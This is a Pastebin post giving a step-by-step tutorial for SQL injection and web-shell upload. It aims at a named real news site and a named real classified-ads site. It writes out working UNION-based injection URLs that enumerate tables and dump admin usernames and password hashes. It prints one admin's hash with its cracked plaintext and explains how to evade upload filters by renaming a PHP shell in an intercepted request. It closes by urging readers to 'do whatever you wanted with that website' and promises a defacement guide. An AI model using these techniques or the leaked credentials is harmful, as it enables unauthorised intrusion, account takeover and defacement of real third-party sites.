API tools faq
paste
xW3s13y

SQL INJECTION T+UPLOADING SHELL [ Part 1 & 2 ]

xW3s13y
Apr 2nd, 2013
3,604
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.32 KB | None | 0 0
raw download clone embed print report
  1. SQL Injection Tutorial :-
  2.  
  3. This tutorial is only for educational purposes. Kindly do not misuse it.
  4. Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here" and open in new tab.
  5.  
  6.  
  7. Step1.Find number of columns.
  8. Lets use "ORDER BY" clause here, it is used to sort the columns.Choose any number,
  9. say 10. Here I have assumed that number columns cant be more then 10."--" is used for making anything after it comment.
  10. Now go to this URL
  11. http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
  12. Actually we instructed it sort the result by 10th column. But it returned us with an error,this
  13. means number of columns are less then 10. Lets replace it with 9.
  14.  
  15. http://www.tartanarmy.com/news/news.php?id=130 order by 9. But again we got an error. This
  16. means number of columns are less than 9. Like this we keep on moving, until we dont get any error.
  17. Finally we reach on '6'
  18. http://www.tartanarmy.com/news/news.php?id=130 order by 6--
  19. we didn't get any error, this means there are 6 colums.
  20.  
  21.  
  22.  
  23.  
  24. Step 2.Find vulnerable columns.
  25. Now lets use "UNION ALL" and "SELECT" command. Remember to put dash (-) before 130.
  26. http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--. Click here
  27. We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
  28. In this case the most vulnerable is number 2.
  29.  
  30.  
  31.  
  32.  
  33. Step 3. Find database version.
  34. Replace the most vulnerable column with "@@version" or "verson()" (if first one doesn't work).
  35. http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
  36. We got the version on screen. It is. The only thing to note is that version is 5 point something that
  37. is greater than 5. We would have followed some other approach in case the version would be
  38. less than 5 because there is no database by default like "information_schema" which stores information about tables/columns of other databases. in version less than 5.
  39.  
  40.  
  41.  
  42. Step 4. Finding table names.
  43. Replace vulnerable column no. with "table_name".
  44. http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from
  45. information_schema.tables where table_schema=database()-- Click here
  46. We got first table name on the screen.
  47.  
  48. To get all tables use group_concat
  49. http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- Click here
  50.  
  51.  
  52.  
  53.  
  54. Step 5.Finding column names.
  55. Simlary get all the columns by simply replacing 'table' with 'column'
  56. http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from
  57. information_schema.columns where table_schema=database()-- Click here
  58. There is a repeating element like in this case is 'id' .From it, we come to know which table number
  59. has which columns.
  60.  
  61.  
  62.  
  63.  
  64. Step 6.Fetching data from columns.
  65. We can fetch the data stored in any column. But the interesting ones here are username and password.
  66. These columns are in first table that is tar_admin. "0x3a" is used simply to insert a colon in result to separate it, it is hex of colon.
  67.  
  68. http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--. Click Here
  69.  
  70. So finally we got the usernames and passwords on screen. But passwords are encrypted.
  71. Mostly these encryptions are crackable. Lets choose any username say
  72. "Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .Lets logon to http://md5crack.com/crackmd5.php and put the hashed(encrypted) password here.
  73. And it would crack for us. We got 'oorwullie' in result ( password in clear text).
  74.  
  75.  
  76. Note:Hashes are type of encryptions which are irreversible. There are numberless online crackers available. Keep trying. Sometimes very strong hashes can not be cracked.
  77. Where is the login panel or login page of website ?
  78. So you got the key, where is lock now ? Most of the websites have login pages at default locations.
  79. There is any website, say www.xyz.com. The login page would be at
  80. www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
  81. Download this admin page finder from here and it would try all these default pages.
  82.  
  83.  
  84.  
  85.  
  86. UPLOADING YOUR SHELL VIA IMAGES USING TAMPER DATA.
  87.  
  88.  
  89. Many times you get login of a website, but you are unable to upload your PHP shell !
  90. Today i'll show you how to upload your PHP shell through Tamper Data an Firefox Add-on
  91.  
  92. Install Tamper Data firefox add-on:
  93. Download Tamper Data here : https://addons.mozilla.org/en-us/firefox/addon/tamper-data/
  94. Now Install it and Restart Firefox
  95.  
  96. Rename shell:
  97. Note: You have to rename you .php shell to .jpg to bypass the website's security
  98. To upload a shell, of-course you needed a upload option in login page or anywhere !
  99.  
  100. Demo:
  101. As an example i'll take - http://freead1.net/post-free-ad-to-USA-42
  102.  
  103. It is a free classified ads posting website, so i got a upload option there !
  104. Find your upload option click on browse, locate you .jpg shell and select it !
  105.  
  106.  
  107. Now click on Tools in Firefox Menu bar and Select Tamper Data, Tamper Data plugin will open in a new window !
  108.  
  109.  
  110. Before Clicking on Upload button click on "Start Tamper" in Tamper Data window..
  111. Note: Before Clicking on "Start Tamper" close every extra tab you have opened.. If you want this tutorial to be open... Just open it in another browser
  112.  
  113. Now click on upload button !
  114.  
  115. After clicking on upload button "Tamper with request?" window will appear !
  116. Click on "Tamper" button
  117.  
  118.  
  119. After a click on "Tamper" you will see "Tamper Popup"
  120. In Tamper Popup Window, Copy "POST_DATA" text in Notepad
  121.  
  122.  
  123. After Copying it to Notepad... "Find yourshell.jpg" and rename it to .php.
  124.  
  125. Now copy Notepad's text back to "POST_DATA" field..and click OK
  126. It will Upload the shell as .php and you can execute it easily !
  127. Find your .php shell & do whatever you wanted with that website
  128. that's all !
  129.  
  130.  
  131.  
  132. THERES A PART 3 OF IT . THE UPLOADING YOUR DEFACEMENT PAGE !
  133.  
  134. ~ xW3s13y
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!